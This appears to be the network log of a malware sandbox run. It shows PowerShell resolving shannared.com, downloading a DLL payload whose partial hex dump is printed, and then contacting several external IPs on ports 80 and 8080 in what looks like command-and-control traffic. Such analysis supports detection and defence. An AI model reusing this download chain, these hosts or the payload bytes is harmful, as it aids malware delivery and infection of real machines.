Jan 27, 2021 00:10:18.513123989 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513133049 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513180017 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513217926 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513243914 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513288975 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513293028 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513334990 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513366938 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513412952 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513453960 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513520002 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513540983 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513581991 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513643026 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513657093 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513751984 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513804913 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513823032 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.513880014 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.513952017 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.514842033 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.514904022 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.514970064 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.514977932 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515011072 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515058994 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515078068 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515100956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515139103 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515168905 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515177011 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515234947 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515269041 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515271902 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515311956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515341043 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515348911 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515396118 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515415907 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515460968 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515536070 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515536070 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515577078 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515616894 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515649080 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515655994 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515706062 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515726089 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515748978 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515784979 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515822887 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515832901 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515861988 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515897989 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515899897 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515938997 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.515970945 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.515975952 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516024113 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516046047 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516066074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516104937 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516136885 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516143084 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516180992 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516212940 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516217947 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516258001 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516285896 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516294956 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516343117 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516362906 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516383886 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516421080 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516459942 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516462088 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516499996 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516534090 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516535997 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516575098 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516608953 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516611099 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516659021 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516680002 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516700983 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516738892 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516771078 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516777039 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516815901 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516845942 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516851902 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516891003 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516918898 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.516927004 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516976118 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.516997099 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.517018080 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.517055035 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.517088890 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.517093897 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.517132998 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.517159939 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.517169952 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.517194986 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.520858049 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.522802114 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.522912979 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.522941113 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.523077011 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.523415089 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.523442984 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.523544073 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.523757935 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.523785114 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.523807049 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.523847103 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.524117947 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524143934 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524168015 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524189949 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524207115 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.524251938 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.524563074 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524586916 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524609089 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.524656057 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525001049 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525024891 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525070906 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525073051 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525100946 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525141001 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525408983 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525456905 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525479078 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525490999 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525554895 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525759935 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525846958 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525871992 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525895119 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525919914 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525943041 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525944948 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525971889 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.525989056 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.525998116 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.526048899 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.526454926 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.526478052 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.526530027 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.528423071 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.529982090 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.530010939 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.530073881 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.530113935 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.530271053 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.530304909 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.530349016 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.678251982 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678312063 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678349972 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678386927 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678509951 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678558111 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.678620100 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.678666115 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678706884 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.678775072 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.678987026 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679065943 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.679071903 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679234028 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679301023 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.679364920 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679531097 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679579020 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679610968 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.679621935 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679689884 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.679765940 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679815054 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.679883003 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.680073977 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680145979 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.680217028 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680499077 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680536032 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680573940 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.680636883 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680707932 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.680810928 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680850029 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.680922985 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.680968046 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.681107998 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.681178093 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.681251049 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.681291103 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.681355000 CET	80	49165	192.169.223.13	192.168.2.22
Jan 27, 2021 00:10:18.681360960 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.885905027 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:18.996220112 CET	49165	80	192.168.2.22	192.169.223.13
Jan 27, 2021 00:10:36.195997953 CET	49166	80	192.168.2.22	84.232.229.24
Jan 27, 2021 00:10:36.241569042 CET	80	49166	84.232.229.24	192.168.2.22
Jan 27, 2021 00:10:36.749578953 CET	49166	80	192.168.2.22	84.232.229.24
Jan 27, 2021 00:10:36.809248924 CET	80	49166	84.232.229.24	192.168.2.22
Jan 27, 2021 00:10:37.326960087 CET	49166	80	192.168.2.22	84.232.229.24
Jan 27, 2021 00:10:37.385879040 CET	80	49166	84.232.229.24	192.168.2.22
Jan 27, 2021 00:10:41.493772030 CET	49167	8080	192.168.2.22	51.255.203.164
Jan 27, 2021 00:10:44.503439903 CET	49167	8080	192.168.2.22	51.255.203.164
Jan 27, 2021 00:10:50.510046005 CET	49167	8080	192.168.2.22	51.255.203.164
Jan 27, 2021 00:11:02.532809019 CET	49168	8080	192.168.2.22	51.255.203.164
Jan 27, 2021 00:11:05.534243107 CET	49168	8080	192.168.2.22	51.255.203.164
Jan 27, 2021 00:11:11.540600061 CET	49168	8080	192.168.2.22	51.255.203.164
Jan 27, 2021 00:11:29.811024904 CET	49169	8080	192.168.2.22	217.160.169.110
Jan 27, 2021 00:11:29.832747936 CET	8080	49169	217.160.169.110	192.168.2.22
Jan 27, 2021 00:11:30.324589014 CET	49169	8080	192.168.2.22	217.160.169.110
Jan 27, 2021 00:11:30.347919941 CET	8080	49169	217.160.169.110	192.168.2.22
Jan 27, 2021 00:11:30.855274916 CET	49169	8080	192.168.2.22	217.160.169.110
Jan 27, 2021 00:11:30.878371954 CET	8080	49169	217.160.169.110	192.168.2.22
Jan 27, 2021 00:11:30.881419897 CET	49170	8080	192.168.2.22	217.160.169.110
Jan 27, 2021 00:11:30.902992964 CET	8080	49170	217.160.169.110	192.168.2.22
Jan 27, 2021 00:11:31.416965008 CET	49170	8080	192.168.2.22	217.160.169.110
Jan 27, 2021 00:11:31.439784050 CET	8080	49170	217.160.169.110	192.168.2.22
Jan 27, 2021 00:11:31.947293043 CET	49170	8080	192.168.2.22	217.160.169.110
Jan 27, 2021 00:11:31.969166994 CET	8080	49170	217.160.169.110	192.168.2.22
Jan 27, 2021 00:11:38.674494028 CET	49171	80	192.168.2.22	185.183.16.47
Jan 27, 2021 00:11:41.698185921 CET	49171	80	192.168.2.22	185.183.16.47
Jan 27, 2021 00:11:47.704641104 CET	49171	80	192.168.2.22	185.183.16.47
Jan 27, 2021 00:11:59.720213890 CET	49172	80	192.168.2.22	185.183.16.47
Jan 27, 2021 00:12:02.728841066 CET	49172	80	192.168.2.22	185.183.16.47
Jan 27, 2021 00:12:08.735363960 CET	49172	80	192.168.2.22	185.183.16.47

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 00:10:16.276245117 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 00:10:16.300174952 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 00:10:16.276245117 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	shannared.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 27, 2021 00:10:16.300174952 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	shannared.com		192.169.223.13	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

shannared.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	192.169.223.13	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 00:10:16.480067015 CET	0	OUT	GET /content/lhALeS/ HTTP/1.1 Host: shannared.com Connection: Keep-Alive
Jan 27, 2021 00:10:17.046556950 CET	1	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Tue, 26 Jan 2021 23:10:16 GMT Content-Disposition: attachment; filename="O9TGnKaUCw.dll" Content-Transfer-Encoding: binary Set-Cookie: 6010a158c3613=1611702616; expires=Tue, 26-Jan-2021 23:11:16 GMT; Max-Age=60; path=/ Last-Modified: Tue, 26 Jan 2021 23:10:16 GMT X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Type: application/octet-stream X-Cacheable: YES:Forced Content-Length: 631808 Accept-Ranges: bytes Date: Tue, 26 Jan 2021 23:10:16 GMT Age: 0 Vary: User-Agent X-Cache: uncached X-Cache-Hit: MISS X-Backend: all_requests Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*0p>@@p"nCODE.0 `DATA@4@BSS`J.idata"p$J@.relocn
Jan 27, 2021 00:10:17.046624899 CET	3	IN	Data Raw: 06 00 00 70 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 c6 02 00 00 10 07 00 00 c6 02 00 00 de 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 Data Ascii: pn@P.rsrc@P@P
Jan 27, 2021 00:10:17.046668053 CET	4	IN	Data Raw: 74 05 0f b7 5c 24 30 8b c3 83 c4 44 5b c3 8b c0 ff 25 70 71 46 00 8b c0 ff 25 6c 71 46 00 8b c0 ff 25 68 71 46 00 8b c0 ff 25 64 71 46 00 8b c0 ff 25 60 71 46 00 8b c0 ff 25 5c 71 46 00 8b c0 ff 25 58 71 46 00 8b c0 ff 25 54 71 46 00 8b c0 53 56 Data Ascii: t\$0D[%pqF%lqF%hqF%dqF%`qF%\qF%XqF%TqFSVeF>u:hDju3^[eFeF3DBdu^[@SVu3^[PVPXB^[PQeFeFSVW
Jan 27, 2021 00:10:17.046719074 CET	5	IN	Data Raw: bd fc 65 46 00 81 c7 ff 3f 00 00 81 e7 00 c0 ff ff 8b 5d 00 eb 02 8b 1b 3b dd 74 05 3b 73 08 75 f5 3b 73 08 75 57 3b 7b 0c 0f 8e 96 00 00 00 8d 4c 24 04 8b d7 2b 53 0c 8b 43 08 03 43 0c e8 db fc ff ff 83 7c 24 04 00 74 33 8d 4c 24 0c 8d 54 24 04 Data Ascii: eF?];t;su;suW;{L$+SCC\|$t3L$T$]\|$uL$T$D$%$3L$\|$t4L$T$\|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@
Jan 27, 2021 00:10:17.046763897 CET	7	IN	Data Raw: 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24 01 8b d7 83 ea 04 8d 46 04 e8 b2 fb ff ff 8b 6c 24 01 85 ed 74 34 8b d5 2b d6 8b c6 e8 63 fe ff ff 8b c5 03 44 24 05 8b 53 08 03 53 0c 3b c2 73 0a 8d 14 37 2b d0 Data Ascii: }L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$fFDu$fF\[:CZ,<\|ufFfFC
Jan 27, 2021 00:10:17.046880007 CET	8	IN	Data Raw: f0 ff ff 8b f3 83 ee 04 8b 1e f6 c3 02 75 0f c7 05 c8 65 46 00 09 00 00 00 e9 f5 00 00 00 ff 0d b4 65 46 00 8b c3 25 fc ff ff 7f 83 e8 04 29 05 b8 65 46 00 f6 c3 01 74 45 8b c6 83 e8 0c 8b 50 08 83 fa 0c 7c 08 f7 c2 03 00 00 80 74 0f c7 05 c8 65 Data Ascii: ueFeF%)eFtEP\|teF+;PteFT;= fFu,) fFfF=fF<~3Et}eF7)xt8tx}
Jan 27, 2021 00:10:17.046947956 CET	10	IN	Data Raw: 33 c0 8a c3 8b d6 e8 ad ff ff ff 5e 5b c3 8b c0 83 e0 7f 8b 14 24 e9 a9 ff ff ff c3 50 52 51 e8 e4 3a 00 00 83 b8 04 00 00 00 00 59 5a 58 75 01 c3 31 c0 e9 d8 ff ff ff c3 8d 40 00 53 8b d8 e8 c4 3a 00 00 89 98 04 00 00 00 5b c3 56 57 89 c6 8b 7c Data Ascii: 3^[$PRQ:YZXu1@S:[VW\|$1t+~9)@\|9G1_^@Sr:g:3[@VW9wt/x*_^t1\|9x_^SVW
Jan 27, 2021 00:10:17.047039986 CET	11	IN	Data Raw: 46 eb 06 f7 d8 7e 4b 78 49 5b 29 de eb 47 fe c5 8a 1e 46 eb 9c bf ff ff ff 0f 8a 1e 46 84 db 74 df 80 fb 61 72 03 80 eb 20 80 eb 30 80 fb 09 76 0b 80 eb 11 80 fb 05 77 d0 80 c3 0a 39 f8 77 c9 c1 e0 04 01 d8 8a 1e 46 84 db 75 d5 fe cd 75 02 f7 d8 Data Ascii: F~KxI[)GFFtar 0vw9wFuuY12_^[@SPvBt@IuZ)[VW_^@S1\|M=S_/@tytS0@ta
